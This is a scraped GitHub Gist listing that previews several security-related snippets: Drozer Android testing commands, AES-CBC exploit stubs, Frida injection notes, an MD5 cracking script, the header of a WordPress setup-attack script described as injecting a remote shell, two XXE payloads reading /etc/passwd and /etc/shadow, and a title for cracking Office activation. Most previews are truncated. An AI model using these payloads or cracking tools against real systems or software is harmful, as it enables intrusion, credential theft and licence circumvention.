Skip to content

Instantly share code, notes, and snippets.

View bl4ckbo7's full-sized avatar

0xA bl4ckbo7

View GitHub Profile
#Finding Bezout's Identities using Inverse modulo algorithm - PoC
#let gcd(n,e)
#from ex + by = 1
#x = e^(-1) mod n
#Author: bl4ckbo7
#!/usr/bin/env python3
e = eval(input("Enter the value of a: "))
n = eval(input("Enter the value of b: "))
@pishangujeniya
pishangujeniya / mail-exchange-2019.md
Last active June 18, 2024 13:34
Configuring and installing Mail Exchange 2019
@castexyz
castexyz / drozer.md
Last active April 8, 2025 19:26
Drozer commands
  • Drozer - Drozer allows you to search for security vulnerabilities in apps and devices by assuming the role of an app and interacting with the Dalvik VM, other apps' IPC endpoints and the underlying OS.
    • Starting a session
      • adb forward tcp:31415 tcp:31415
      • drozer console connect
      • drozer console connect --server <ip>
    • List modules
      • ls
      • ls activity
    • Retrieving package information
  • run app.package.list -f
@valorin
valorin / wordpress-setup-attack.sh
Created August 23, 2019 23:48
Proof of concept WordPress setup script attack - sets up a new WP installation and injects a simple shell into /wp-content/themes/twentynineteen/404.php and /wp-hello.php.
#!/bin/bash
#
# WordPress Setup Attack Script
#
# Created by Stephen Rees-Carter (https://stephenreescarter.net/)
#
# This script injects a remote shell into a fresh copy of WordPress that hasn't been set up yet.
# Once the shells have been set up, it removes the config file with the custom database connection to reset the site back to a fresh install.
#
@bl4ckbo7
bl4ckbo7 / nitrxgen.py
Last active March 21, 2020 07:57
Nitrxgen md5 crahking script (Requires the Internet to access the API)
#!/usr/bin/env python3
#Title: Nitrxgen md5 crahking script (Requires the Internet to access the API)
#Author: bl4ckbo7
"""
[ Examples ]
------------
./nitrxgen - hashes.txt
./nitrxgen 6b6e8ca697b4ea4bdc8ac88613ab646e
@zer0tonin
zer0tonin / main.go
Created June 22, 2019 19:26
AES-CBC exploit
package main
import (
"encoding/hex"
"fmt"
"os"
"github.com/gdamore/encoding"
)
@zer0tonin
zer0tonin / main.go
Last active September 13, 2022 01:37
AES-CBC application
package main
import (
"crypto/aes"
"crypto/cipher"
"crypto/rand"
"encoding/hex"
"fmt"
"io"
"os"
@elevenchars
elevenchars / fridanotes.md
Last active March 6, 2025 19:40
My notes on injecting a frida gadget into an apk
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]><foo>&xxe;</foo>
@zthxxx
zthxxx / Activate Office 2019 for macOS VoL.md
Last active May 3, 2025 16:07
crack activate Office on mac with license file